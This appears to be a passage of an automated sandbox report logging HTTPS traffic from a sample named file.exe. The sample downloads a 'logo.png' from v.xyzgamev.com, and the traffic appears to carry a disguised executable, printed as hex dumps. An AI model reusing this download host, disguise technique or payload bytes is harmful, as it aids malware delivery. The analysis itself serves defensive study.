                                                          2022-09-11 08:16:26 UTC546INData Raw: cf 1a b6 75 6d 9e f2 bf 17 1b d6 c8 c0 ae a6 3c dd f6 17 1b d6 db a6 da e3 9e 17 aa 26 5b d7 00 0b ad a6 3e 43 da d7 43 8e 1a f0 f6 9c 80 0d da c7 7a d7 02 61 0a 99 f1 bd 1a d6 1a 06 fb 97 fe 83 da 1e a2 d6 4a 48 55 4d c0 17 1b d6 5b 26 da 71 0c a7 da d6 1b c9 b4 17 aa d7 da d6 1b 6d d6 a5 1f 26 9a d7 b5 af 0d 71 7c d6 e9 c5 fa d7 4a 5f b3 a6 9e e3 da 22 9e d6 a5 d8 da ab 93 57 6f d6 1b 3d 00 e7 da 87 fa 17 1b d6 47 53 03 05 2d 82 53 de 2a d7 1e 67 de 27 9a d7 7d e0 e0 7c 6b 97 6a 95 48 f7 1a 69 0f 3c 5a 56 c8 24 ca d7 90 6d 5a cf f2 55 c8 07 b1 7d 6b 0d f0 97 2a d7 58 17 68 67 1a c8 d9 0b 17 1a da d7 6a d7 46 a8 94 4a 5f 12 da 97 2a d7 e7 f4 ff 9c 32 3f da 37 8a d7 87 95 06 14 9a 6e 23 d7 31 1c 7a 07 4a d6 1a d6 e1 c8 d6 fe 6b 13 6e 17 1b d6 d8 a5 da 6b
                                                          Data Ascii: um<&[>CCzaJHUM[&qm&q|J_"Wo=GS-S*g'}|kjHi<ZV$mZU}k*XhgjFJ_*2?7n#1zJknk
                                                          2022-09-11 08:16:26 UTC550INData Raw: b7 ad 72 68 f1 01 aa 5a d6 0d f1 5a d7 89 74 5a 97 3f b2 1b 56 ea d7 10 05 02 18 95 78 85 de a3 d7 64 70 03 90 5d 71 7d d6 c3 be da f1 ac 07 58 d4 1b 19 64 17 ce b3 da 67 2f 52 1a 77 8a 97 4a 96 7d a1 1b d6 f0 e5 02 17 46 3b da d6 1b d5 c3 4c 1d 93 a9 17 1b d6 53 42 c6 dd d0 17 1b d6 a4 ff 21 8a cc 41 da 77 ca d7 ab 87 bb c7 5f 72 a4 09 ca d7 b4 9f bc f5 78 d6 8b fe a3 d7 60 4a fd b6 fb 52 1e d6 34 49 da 71 7c d7 da d6 1b 3e 43 17 be c3 da d6 1b bd 8c eb da 4b 36 17 1b d6 d1 f5 81 c3 0c 16 db d6 1b 5d 7a fe d9 d6 1b 94 7b 6a 35 36 5b b1 6c d6 1b b7 8a 80 4d 71 fc 17 1b d6 47 3a da e3 9e 17 1b d6 c0 37 e0 17 32 4f da e7 5a d7 b6 4b 5a 6d c8 7f da 47 fa d7 5d 61 eb dd d0 17 5f e3 1b 54 29 17 ee 93 da d6 1b b8 86 83 cd b6 bb 17 1b d6 53 2e da 13 6e 17 1b d6
                                                          Data Ascii: rhZZtZ?Vxdp]q}Xdg/RwJ}F;LSB!Aw_rx`JR4Iq|>CK6]z{j56[lMqG:72OZKZmG]a_T)S.n
                                                          2022-09-11 08:16:26 UTC552INData Raw: 02 ae fc 20 37 8a 30 71 48 08 3e 12 47 ca e4 1c 31 69 9f 32 c0 89 a3 8a c7 8a b1 ff a4 32 9f 0b 47 8b b9 7e 3a 9e c5 4b 67 8a a7 f3 3d 69 81 6c 67 88 44 8b 18 4f 5d 30 9e 6f 05 ce 67 4a 47 73 25 12 c7 61 cf 8a cb 16 2a 94 d8 97 46 23 8e 0b c7 06 e6 b3 d2 8a 22 8b c2 e3 cf 8a 9c f0 66 2f 92 6c b7 6c 9b b6 47 ac c3 cb e4 2a 6b a3 a4 6c 6f 42 47 e0 7d fa 64 69 7f 52 45 e4 cb 8a 9c c7 f0 cb ad e0 ea 87 07 8a 0e 01 85 97 c9 f9 45 89 46 b6 be 4f 45 08 c6 8a 46 64 f9 fc 62 69 17 ba c6 7b 57 8a 2c e2 c4 0a c6 25 a1 85 63 69 aa af 3c 5d d3 9a 47 2f 2b c0 c5 23 0f 8a 1a b2 a6 0f 66 4a 47 1f 18 40 f7 ba de 0b 76 23 47 47 41 c2 c0 5e 77 8a 67 ca c7 eb c7 83 d3 db 69 69 76 74 08 21 0d 8b f3 7e 56 b8 a4 97 88 5b 59 17 c7 b9 77 69 d1 7c c7 0b c2 16 76 23 47 63 7a 5d 7a
                                                          Data Ascii: 70qH>G1i22G~:Kg=ilgDO]0ogJGs%a*F#"f/llG*kloBG}diREEFOEFdbi{W,%ci<]G/+#fJG@v#GGA^wgiivt!~V[Ywi|v#Gcz]z
                                                          2022-09-11 08:16:26 UTC556INData Raw: ab 1e 1f a1 34 f3 a4 48 2f 7f c2 b2 87 b2 e2 3f 1f 87 02 cc 11 dc 21 b2 78 0d ee db 38 2d 61 bc 71 4c 81 5c 3f c4 a1 6c b1 7c c1 0c d1 b2 09 2c e1 3c f1 cc 00 dd bf c5 20 ed 30 fd 40 8d 50 32 08 ad 60 bd 70 4d 80 5d 3f c5 a0 6d b0 7d c0 0d d0 b2 08 2d e0 3d f0 c5 97 5f a6 6e af 62 f1 34 0f d2 1f e2 8f ca 3f f2 4f 82 5f 92 6f 02 07 b2 7f 42 8f 52 9f 62 0f ca bf 72 cf 02 df 12 ef 82 07 32 ff c2 0e d3 1e e3 8f cb 3e f3 4e 83 5e 93 6e 02 06 b3 7e 43 8e 53 9e 63 0f cb be 73 ce 03 de 13 ee 82 06 33 fe c3 0d d0 1d e0 8f c8 3d f0 4d 80 5d 90 6d 02 05 b0 7d 40 8d 50 9d 60 0f c8 bd 70 cd 00 dd 10 ed 82 05 30 fd c0 0c d1 1c e1 8f c9 3c f1 4c 81 5c 91 6c 02 04 b1 7c 41 8c 51 9c 61 0f c9 bc 71 cc 01 dc 11 ec d7 02 be 8b d2 33 66 ff 3e cb 12 b3 26 9a cf 74 c1 9f f9 2c
                                                          Data Ascii: 4H/?!x8-aqL\?l|,< 0@P2`pM]?m}-=_nb4?O_oBRbr2>N^n~CScs3=M]m}@P`p0<L\l|AQaq3f>&t,
                                                          2022-09-11 08:16:26 UTC558INData Raw: ef 22 1f 92 e7 32 ff a3 d9 70 a2 72 a4 b1 67 4f d5 45 fd 19 f6 68 f5 3c a1 40 3d ba e4 19 17 f8 6d b2 b6 e3 ff c4 b1 d2 69 27 ea a5 6a c6 c6 33 fc ca 4f fe 3b b0 e6 ba 8f 42 87 4a 0f fa 9f 5a 97 62 af 6a a7 c2 17 72 07 cb 1e d3 16 db 0e 4a 2e f3 3e fb 36 83 4e c3 ef 8b 56 9b 6e a3 66 ab 1e 0a 7e 43 8e 20 c1 47 a6 73 17 c3 b6 7b ce 03 de 13 d6 b2 0e 23 ee 2b e6 3b f6 c3 a7 c0 05 c8 1d d0 2d e0 25 42 0d f0 3d f8 35 88 45 90 f7 c0 55 98 6d a0 7d b0 75 12 0d 40 8d 48 85 58 95 60 07 c0 a5 68 bd 70 cd 00 c5 a2 0d 10 dd 18 d5 28 e5 30 57 c0 f5 38 0d c1 1c d1 14 72 0c e1 2c e9 24 f9 34 81 e7 c1 44 89 5c 91 6c a1 64 02 0c b1 7c b9 74 49 84 51 37 c1 94 59 ac 61 bc 71 b4 d2 0c 01 cc 09 c4 19 d4 21 47 c1 e4 29 fc 31 0c c6 03 62 0b d6 1b de 13 ee 23 f6 97 c6 33 fe 4b
                                                          Data Ascii: "2prgOEh<@=mi'j3O;BJZbjrJ.>6NVnf~C Gs{#+;-%B=5EUm}u@HX`hp(0W8r,$4D\ld|tIQ7Yaq!G)1b#3K


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.349725104.21.40.196443C:\Users\user\Desktop\file.exe
                                                          TimestampkBytes transferredDirectionData
                                                          2022-09-11 08:16:26 UTC558OUTGET /logo.png HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                          Host: v.xyzgamev.com
                                                          2022-09-11 08:16:26 UTC558INHTTP/1.1 200 OK
                                                          Date: Sun, 11 Sep 2022 08:16:26 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 67409
                                                          Connection: close
                                                          Last-Modified: Wed, 24 Aug 2022 05:04:02 GMT
                                                          ETag: "10751-5e6f59c08b027"
                                                          Cache-Control: max-age=14400
                                                          CF-Cache-Status: HIT
                                                          Age: 6117
                                                          Accept-Ranges: bytes
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UGYCu1hWQIY2U4l5e6c53hFviDYSt7rU8vWaRzXlKjF0Q8T%2FrWZ03JZeURRJPT9D2iixAxJdSIEeux7DauQ0fgaeZAp0FGx2rkU6LP2XFYqMsqfdZF1Lz6BRaoKYe4%2FpvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 748ef615fb9bbbd3-FRA
                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                          2022-09-11 08:16:26 UTC559INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 10 00 00 00 5c 08 06 00 00 00 a6 e7 ea b6 00 00 17 18 49 44 41 54 78 01 ed 5d 0b 94 1c 55 99 be 3a d3 81 c0 2e 82 c2 2a 82 08 12 10 90 05 92 aa 9a 84 90 d8 5d b7 7b b2 41 e2 41 81 28 b8 bb 0a 08 8a 1b 5c 84 98 05 e5 31 9a ae 9a 09 89 c0 02 0a 41 40 36 e1 81 06 17 10 1f 90 cc 24 01 f4 08 28 c8 43 58 58 7c 10 1e 64 fa 11 92 49 55 75 1e 99 64 7a ef b7 e6 b8 a4 b7 67 e6 bf d5 75 bb aa 87 fb 9d 73 4f e7 31 d3 d3 67 ea d6 57 ff fd ff ef ff 7e 16 07 66 76 ad db 2b ed 54 4c ee 7a a7 71 d7 9f 63 bb c1 65 b6 eb 3b dc f1 7b c4 df e7 8b bf 5f 22 d6 b9 d9 ee 60 56 da f5 8f 4e 77 55 77 67 1a 1a 1a ef 4c a4 7b 36 1f cc 9d ca 79 dc 0d ee b2 5d ff cf e2 b5 2a b3 32 79 6f bb 78 7d 5e 7c ef cd dc f5 ff 29 dd e5 ed cb
                                                          Data Ascii: PNGIHDR\IDATx]U:.*]{AA(\1A@6$(CXX|dIUudzgusO1gW~fv+TLzqce;{_"`VNwUwgL{6y]*2yox}^|)
                                                          2022-09-11 08:16:26 UTC560INData Raw: 93 8f 58 9f 15 44 e2 69 f2 d0 d0 04 92 10 70 27 b8 54 3e 59 19 5c 6f dc 54 4d b1 18 90 ed de 78 78 26 1f fc b7 26 0f 0d 4d 20 09 c8 7b f0 bc b7 4d 2a 51 ea 04 df 40 a2 93 c5 08 b4 f9 c3 43 84 69 68 68 02 89 07 5d 5d d5 77 73 d7 7f 4c 92 3c e6 31 0d 0d 0d 4d 20 82 0c 3e 2f 79 6c b9 86 1e 79 68 68 8c 59 68 02 99 79 ed d0 6e dc f5 d6 48 94 69 57 21 d9 ca 34 34 34 34 81 70 27 38 47 82 3c d6 a1 8c ca 34 34 34 34 81 20 f7 21 d3 24 27 92 95 5f 60 80 86 86 86 26 10 f4 ba c8 68 3d 40 38 0c d0 d0 d0 d0 04 c2 f3 c1 9d 54 02 41 6f 0c 03 34 34 34 34 81 a0 23 96 da 69 9b 71 fd 27 74 d5 a5 75 a0 a1 09 a4 da c5 de 8d c5 54 01 e2 2b 6a f4 41 53 79 6a 54 d3 e9 f6 75 dc e8 28 66 cd 79 c5 ac 75 77 81 1b bf 2d 65 8d 42 c9 b6 2a 85 ac 35 84 57 fc 1d ff 2e fe ff ae a2 6d 7e bd
                                                          Data Ascii: XDip'T>Y\oTMxx&&M {M*Q@Cihh]]wsL<1M >/ylyhhYhynHiW!4444p'8G<4444 !$'_`&h=@8TAo4444#iq'tuT+jASyjTu(fyuw-eB*5W.m~
                                                          2022-09-11 08:16:26 UTC561INData Raw: 8d 33 a8 7b ee 95 74 7a 77 99 72 70 d1 ee 98 51 27 02 f1 bf 4f 22 90 7c 70 f7 98 3f c2 e4 fd 8b ea 32 76 6e f2 91 82 10 76 48 d4 d2 1f 1c 98 36 6d 1f 16 02 d0 7b 40 90 26 75 46 b5 cd 8f b2 11 b0 65 c5 b8 23 c5 f1 63 87 c4 51 e5 67 d5 5e f6 1e 16 02 43 0f b1 f7 8a 23 ce 72 99 ca cc 96 87 c6 1d 31 aa d5 c4 4e b1 23 71 fd 11 92 83 b0 09 5a 54 77 92 40 20 90 a4 4b 44 a3 cf 23 ca 0d 59 51 5c 48 8c 42 9e c5 91 aa 36 2c bc 92 96 44 f5 1e 1c f3 11 88 13 5c 3c cc 85 5c 2a 71 21 ef ad 1a 46 8a 35 80 ea ec a3 c6 15 b3 d6 4f 24 7e e6 6d 6c 04 88 68 62 89 c4 b1 e2 9e 46 fb 59 aa 4f b2 94 78 9f fb 24 a2 9d 11 f3 6b 19 c7 3b 55 86 3c a6 3b c1 fe ac 01 80 7c 32 6e f0 56 d3 09 a4 f6 98 91 b5 7c 62 14 fa 5f 88 56 1a e9 db c2 51 9b f2 b3 10 55 d7 3a b0 cf 25 26 51 5f 1e eb
                                                          Data Ascii: 3{tzwrpQ'O"|p?2vnvH6m{@&uFe#cQg^C#r1N#qZTw@ KD#YQ\HB6,D\<\*q!F5O$~mlhbFYOx$k;U<;|2nV|b_VQU:%&Q_
                                                          2022-09-11 08:16:26 UTC562INData Raw: b8 e9 1c ef 37 12 d2 e1 97 09 03 79 62 01 54 a5 e4 2e dc f9 fe df 0f 43 20 57 d0 ea f1 a6 9a 61 5b f2 2e 68 97 d5 10 c8 15 94 1b 77 fb ca d4 19 8a 75 20 67 12 d5 b0 f3 43 3e d0 be a7 f2 9e c0 10 aa 66 12 08 a1 91 92 6e 60 c5 cd fc 5b 33 cc 0f b1 66 01 73 6f 25 4d 78 1e 22 f4 c8 34 15 e9 05 95 03 a9 dd 94 10 d1 0d 7f e3 9a a7 13 2f d6 0f 98 42 60 68 10 d1 bf f2 33 ec 6d d8 de 97 3a 9d 56 3e 6d bb 45 71 19 f7 0e ca e7 c0 e7 dd c5 81 2c bf f9 10 e2 3e 7c 89 29 42 6e be 77 64 93 85 64 d8 77 3d 0d 3a f8 3f 02 43 21 9a cc 5d 01 30 40 4a 72 86 c6 d2 d9 cb aa 6d 2c 01 80 7a 51 90 da 6f c9 47 31 a7 72 f2 b0 12 e0 f4 e4 83 89 5d b8 eb c3 74 e1 52 65 c8 d4 b6 ee da 27 cd e6 d5 bb 1d 4c ac 7e bc 25 5a f8 95 7c 7e e4 57 44 72 d4 a3 7c 8e cd cb 77 3b a4 f6 e9 4f 95 17
                                                          Data Ascii: 7ybT.C Wa[.hwu gC>fn`[3fso%Mx"4/B`h3m:V>mEq,>|)Bnwddw=:?C!]0@Jrm,zQoG1r]tRe'L~%Z|~WDr|w;O
                                                          2022-09-11 08:16:26 UTC564INData Raw: 6a 9a 44 b0 7b 8b 65 a1 29 d0 ce 0f 1c ca 14 00 21 1c 21 ac 54 b4 8c 7b 1b a9 cd 03 d5 07 d8 1e 68 f5 8f 29 f2 78 00 43 a7 1a 6e 70 73 fd f9 ef 24 02 01 30 8f 05 89 d2 38 22 0f ba 6f 48 88 9a 39 66 ca 66 f2 c1 40 42 8e 2c 9b 60 85 a7 da 76 11 2e 64 45 6e 5d dd e4 0b b9 10 3f 37 42 93 9f ab 9b 4a 20 bd a9 ef 10 c6 66 92 81 41 52 2a a3 60 e4 5b 50 12 8e 9d 40 6a 12 ee c8 a7 35 71 cf fd be 90 35 3f c2 54 03 c2 2c 54 56 70 03 c7 73 5c 81 fd bf b7 04 19 75 d6 44 94 b2 1d 27 29 0e 2d 51 3e 5b 8b 11 13 4c 01 44 27 ee 49 22 09 da af 92 38 f0 fe 98 f4 af 46 4c 58 b1 60 2b a1 60 3f 55 60 54 04 55 75 92 08 04 78 79 e6 84 dd f0 30 41 45 44 2d 79 98 37 10 12 a6 d1 13 09 ca a5 b6 eb bd d6 ac 88 03 ea 43 94 7e 59 93 51 33 08 79 11 ca aa 51 db ce 95 b2 e6 95 aa 1b a5 44
                                                          Data Ascii: jD{e)!!T{h)xCnps$08"oH9ff@B,`v.dEn]?7BJ fAR*`[P@j5q5?T,TVps\uD')-Q>[LD'I"8FLX`+`?U`TUuxy0AED-y7C~YQ3yQD
                                                          2022-09-11 08:16:26 UTC565INData Raw: a3 47 e6 86 28 15 bb 46 e7 47 e6 45 e4 46 e7 09 a8 47 e6 62 05 f3 94 44 e5 47 e6 62 05 fb 9c 44 e5 47 e6 62 05 f9 9e 44 e5 47 e6 bb 3b 0a 0b c4 e4 47 e6 e9 00 00 00 00 00 00 00 50 15 45 00 4c 4d 04 05 80 de 5e 63 63 00 00 00 00 00 00 00 e0 e0 02 23 2a 0a 09 08 00 70 70 00 00 70 70 00 00 00 00 00 a4 b3 17 00 00 10 10 00 00 80 80 00 00 00 00 10 10 10 10 00 00 10 10 00 04 04 00 00 00 00 00 00 04 04 00 00 00 00 00 00 00 00 01 01 00 10 10 00 bf a0 1e 01 02 02 00 00 00 00 10 10 00 10 10 00 00 00 10 10 00 10 10 00 00 00 00 00 10 10 00 00 80 1a 9a 00 62 62 00 00 14 81 95 00 28 28 00 00 00 c0 c0 00 fc da 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f0 00 a0 a7 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: G(FGEFGbDGbDGbDG;GPELM^cc#*ppppbb((&
                                                          2022-09-11 08:16:26 UTC566INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          2022-09-11 08:16:26 UTC568INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          2022-09-11 08:16:26 UTC569INData Raw: 24 52 60 e8 e0 f8 96 02 de d5 78 28 85 d5 78 34 64 76 8b 91 93 b6 3d 80 80 10 a8 9a 74 15 62 08 2c b1 18 ac 10 39 2c bd 14 ac 10 39 2c b5 1c ac 10 e6 f3 79 c5 b9 10 11 74 66 90 8e 71 c5 b9 10 11 69 60 9a 92 10 ef 28 74 db c1 b9 10 b1 d9 c1 b9 10 9b a6 29 84 80 10 78 d8 1c ac 10 40 af 2a ee f8 4a cd 60 30 1b 8b 0e 8b 01 00 f6 f3 79 c5 b9 10 11 74 66 90 8e 71 c5 b9 10 11 69 60 9a 92 10 ef 28 74 db c1 b9 10 9b 86 75 c1 b9 10 78 a4 60 ac 10 41 ae 2a 5e 53 5d 5e d4 8b d2 57 01 00 f6 f3 79 c5 b9 10 11 74 66 90 8e 71 c5 b9 10 11 69 60 9a 92 10 ef 28 74 db c1 b9 10 9b 9e 6d c1 b9 10 78 cc 08 ac 10 42 ad 2a 5e 63 6d 68 e2 8b a6 23 01 00 b8 f9 50 04 04 10 04 c5 6c ac 10 11 04 b9 10 ac 10 11 04 c1 68 ac 10 78 d4 10 ac 10 f8 b3 a5 01 00 7c 47 c0 81 45 cf 8b 72 f6 00
                                                          Data Ascii: $R`x(x4dv=tb,9,9,ytfqi`(t)x@*J`0ytfqi`(tux`A*^S]^Wytfqi`(tmxB*^cmh#Plhx|GEr
                                                          2022-09-11 08:16:26 UTC570INData Raw: ad 10 1f 81 7a 0a 01 00 00 f2 0d ad ad 10 29 04 41 cc b0 10 65 70 ed da 37 05 00 39 44 6d 65 0e 93 28 ce 0e 00 e8 68 86 06 00 e8 88 74 14 00 eb 81 e9 7b fa 77 2c b1 ad 43 06 00 68 7c 16 02 00 6a 6b e9 23 c0 0b 00 8b 7b cb cc ae 00 56 8b 2d 57 01 00 a9 a9 ca 39 ac a0 10 ef ca b9 3c b0 10 f8 47 aa 05 00 59 a6 2f 55 45 b4 63 40 01 be 9c 72 06 00 59 00 a6 ea 1d 88 80 10 93 cd 4a fb 76 8f ed f3 4e be 53 b1 0a 00 59 b0 84 93 01 00 7c 7b fb 76 72 50 bf 55 b5 08 00 59 6a f3 80 1f 01 05 92 0b ce 0c 6a 66 64 f8 02 92 10 f8 36 cb 15 00 8b 72 72 79 79 d6 55 3b f3 80 c9 cc a1 61 73 83 79 35 2c 15 ad ad 10 1f 8b 41 c5 00 00 83 e6 99 fc 3b cb 84 71 86 7d fc 77 5b 8f 89 a9 81 10 95 45 b4 7c 5f 01 05 ac 2f 59 cc a1 67 fe 99 e4 0f 8b 12 96 00 00 57 01 05 bb 26 33 02 00 76
                                                          Data Ascii: z)Aep79Dme(ht{w,Ch|jk#{V-W9<GY/UEc@rYJvNSY|{vrPUYjjfd6rryyU;asy5,A;q}w[E|_/YgW&3v
                                                          2022-09-11 08:16:26 UTC572INData Raw: 47 c8 cf 95 be 41 a9 00 00 8b 7b a6 be da 2c 1e 00 56 be a5 50 1d 00 56 be db 24 17 00 56 be df 2a 1d 00 56 be cf 3a 1d 00 56 be ff 0c 1b 00 56 be 9d 7a 0f 00 56 be 12 e0 1a 00 68 2d 5e 1b 10 f8 e2 0a 00 00 83 47 e0 87 ab a8 a0 10 4e 9d 95 a9 ca 25 b0 a0 10 9b be 09 bc 80 10 ef 29 53 45 b4 55 80 ad ac a0 10 93 7b 07 8b 63 47 af ca 25 b0 a0 10 ef 29 29 2f 55 45 b4 7c 83 0b 78 f9 01 00 eb f0 73 08 e1 81 10 ef ea 21 b4 80 10 95 45 b4 6e 72 38 d1 81 10 40 af ea 11 84 80 10 95 45 b4 7e f5 8b 50 2c f7 2f 59 cd 60 2c 83 cf 60 2c 56 9d a9 6a e8 7e 69 00 00 a6 9a 95 a9 ca 25 b0 a0 10 9b be 09 bc 80 10 ef 29 53 45 b4 55 80 ad ac a0 10 93 7b 07 8b 63 47 af ca 25 b0 a0 10 ef 29 29 2f 55 45 b4 7c 83 0b 7c fd 01 00 eb f0 73 08 e1 81 10 ef ea 21 b4 80 10 95 45 b4 6e 72
                                                          Data Ascii: GA{,VPV$V*V:VVzVh-^GN%)SEU{cG%))/UE|xs!Enr8@E~P,/Y`,`,Vj~i%)SEU{cG%))/UE||s!Enr
                                                          2022-09-11 08:16:26 UTC573INData Raw: 05 00 00 ca a5 20 b0 10 b3 2f 3c b0 10 f8 0c 1e 05 00 7c 47 d4 b3 33 20 b0 10 f8 d9 21 10 00 85 45 b4 11 0d 57 21 1e 10 ef ca b1 34 b0 10 f8 c7 d4 04 00 a6 a6 2f 53 7b 07 5c af ac a0 10 64 3c 20 7c 16 02 00 6a 6b e9 fc 15 01 00 8b 7b 75 73 af 00 2d 40 62 a9 ca 39 ac a0 10 ef ca b9 3c b0 10 f8 14 06 05 00 a6 a6 2f 55 45 b4 6f 71 6a 56 be 28 3b 04 00 a6 00 a6 ea 1d 88 80 10 93 cd 4a fb 76 8f 35 f3 80 ab ec ef 83 90 04 00 cc f3 9e 01 9c a9 66 64 70 8b 93 10 f8 d7 34 0b 00 8b fe 7d 8d 73 82 01 f6 be 95 11 b9 10 13 76 36 29 6e ec f9 00 11 00 59 da e6 99 fc 56 be 5d 97 22 00 59 d0 cc a1 61 45 b4 7d 5f 06 b8 39 f3 22 00 59 00 9e 82 b9 02 01 00 00 17 e3 0b 00 00 83 fe 99 e4 75 42 c8 8a 7d e3 e1 60 6e ec 17 f0 0f 00 59 9a 95 3c 6a ff ca 91 15 b1 10 ef ea 05 90 80
                                                          Data Ascii: /<|G3 !EW!4/S{\d< |jk{us-@b9</UEoqjV(;Jv5fdp4}sv6)nYV]"YaE}_9"YuB}`nY<j
                                                          2022-09-11 08:16:26 UTC574INData Raw: 0f b1 de 67 bd da c6 5d 43 60 f3 f9 7c 4d 5e df 8e 8c 79 79 de 59 cb c6 00 01 00 00 74 7d 82 d6 55 8b c6 4d 0c 8d 9a 9a cc b9 7c be 1c 57 65 23 f3 f9 7c b9 4f 91 2d 9b 54 86 cf cc b9 17 d7 c3 f8 82 57 a6 7c 82 8c 8e 8a 40 cb dc 59 86 94 11 b9 75 93 16 ae e7 21 2e 00 85 45 99 2d 67 ec f8 84 fe 71 0c 74 7e 81 c6 41 86 8c f9 ba 49 84 89 47 c2 5f 50 de 59 87 c6 5d 64 46 b1 fe 81 fc 75 dc 29 7b db 54 71 85 7b f2 7c ea 1a 57 a6 70 c2 84 bd ff 83 e6 99 fc 80 be 3e 0f 8b 6d e9 00 00 8a 8c 3a 1c 54 70 38 35 7c 73 40 ad 18 bd a5 08 63 be 3e 0f 8b 54 d0 00 00 83 fe 75 08 74 7d 82 ce 4d 8b c6 4d 0c 8d 99 ef fe 32 e8 98 70 fa 22 e9 44 07 c1 be 62 28 8d 79 be 1c 57 53 d0 37 c0 74 6a 9c fe 81 fc 74 78 81 cb 47 81 b8 1a 57 71 8f 7b 1b e6 3e f3 f3 e8 e2 7c b9 f3 9b 54 49
                                                          Data Ascii: g]C`|M^yyYt}UM|We#|O-TW|@Yu!.E-gqt~AIG_PY]dFu){Tq{|Wp>m:Tp85|s@c>Tut}MM2p"Db(yWS7tjtxGWq{>|TI
                                                          2022-09-11 08:16:26 UTC576INData Raw: 7b f1 8a 79 f3 ea 3d a8 80 10 f9 12 fb 00 00 83 78 fe 70 79 8f e3 68 08 33 f3 80 a9 03 ea 00 00 83 78 fa 0e 8b 5a de 00 00 8b c5 2e e9 c4 b5 73 c6 41 85 c7 2e eb c3 4c 87 7a f1 07 8a 3d b8 00 00 8b 86 b5 18 a0 10 9b b6 81 1c a0 10 9b 5a d2 fa c2 ec aa 59 4f a2 c5 87 f5 22 df e7 5d 31 08 8b b6 85 18 a0 10 9b 96 a1 1c a0 10 52 41 dc 5c 42 cd 37 e8 af 9e 69 d6 a1 77 8b 3d b3 8e 00 c0 4b f5 1a 11 7c ce 81 22 e7 83 00 00 eb b5 63 ad 90 00 c0 b5 7c ce 81 22 e5 81 00 00 eb a5 73 ac 91 00 c0 b5 7c ce 81 22 e0 84 00 00 eb d5 03 ae 93 00 c0 b5 7c ce 81 22 e1 85 00 00 eb c5 13 b0 8d 00 c0 b5 7c ce 81 22 e6 82 00 00 eb f5 23 b2 8f 00 c0 b5 7c ce 81 22 e2 86 00 00 eb e5 33 af 92 00 c0 b5 72 c0 81 22 ee 8a 00 00 ff 89 12 0e 62 f7 2c 8a d0 f7 1a 8f ec 84 e3 68 08 51 ae
                                                          Data Ascii: {y=xpyh3xZ.sA.Lz=ZYO"]1RA\B7iw=K|"c|"s|"|"|"#|"3r"b,hQ
                                                          2022-09-11 08:16:26 UTC577INData Raw: aa ea bd 28 80 10 4d 02 01 05 02 9a a9 69 eb dc 1f 2b 00 83 7b f9 58 2d 61 7f 69 eb cf 0c 2b 00 85 45 99 2c 6a 9c be 2d bd ad 10 11 74 63 7e 94 fc 00 00 e8 dc ca 01 00 97 97 ff 00 00 e8 c2 d4 01 00 a6 00 9a 95 01 64 c5 49 7f 74 b4 10 93 bf c9 71 25 a1 10 11 74 6b 93 89 f1 75 21 a1 10 99 b1 50 c8 af 0f 00 ff cf b3 44 df f0 42 ad 07 00 85 45 99 00 2d 78 4a c5 7d da 58 ae e1 f3 80 1f 01 9d 40 a7 d1 75 21 a1 10 10 33 f3 2b 1a a2 d8 96 6d f0 80 10 46 e8 3e 21 a1 10 47 dc b5 bb 7a 8b 67 90 fd 7a 05 75 79 5a a8 2c 84 bf 3e 39 10 00 7c a5 26 59 da 45 ce 89 7f 5e 02 a2 10 6c a0 62 3e 21 a1 10 4f d4 8d 83 45 b4 7d 8a fd 7a 05 74 76 53 af 2c 50 45 ce 89 7f 5e 02 a2 10 6c 9a b8 05 98 96 de 67 67 ce 4d f7 cb f1 45 21 a1 10 ef ea b9 2c 80 10 4d 9e a9 66 64 30 cb 93 10
